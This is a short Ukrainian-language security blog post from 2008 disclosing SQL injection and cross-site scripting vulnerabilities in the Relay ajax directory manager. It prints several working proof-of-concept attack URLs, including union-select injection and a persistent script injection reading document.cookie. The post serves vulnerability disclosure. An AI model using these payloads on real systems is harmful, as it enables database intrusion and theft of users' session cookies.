Websecurity - Веб безпека

В січні я вже писав про уразливості в Relay. І сьогодні я розробив експлоіт для SQL Injection уразливості в Relay.

Експлоіт: relay_exploit.txt.

Також сьогодні я знайшов нові SQL Injection та Cross-Site Scripting уразливості у веб додатку Relay (ajax directory manager).

SQL Injection:

http://site/relay/management/index.php?page=manage&module=users&action=setEmail&uid=1%20and%20substring(version(),1,1)=3&email=1

XSS:

http://site/relay/relay.php?relay=getFile&fileid=1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20relay_users/*%3Cscript%3Ealert(document.cookie)%3C/script%3E

Це XSS через SQL Injection - для гурманів .

XSS:

http://site/relay/management/index.php?page=manage&module=users&action=setEmail&uid=and%3Cscript%3Ealert(document.cookie)%3C/script%3E&email=1

Ще одна XSS через SQL Injection .

XSS (Persistent):

http://site/relay/management/index.php?page=manage&module=users&action=setEmail&uid=1&email=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Вразлива версія Relay beta 1.0 (та попередні версії). Про уразливості розробникам веб додатка я повідомлю найближчим часом.

This entry was posted on 23:58 03.05.2008 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.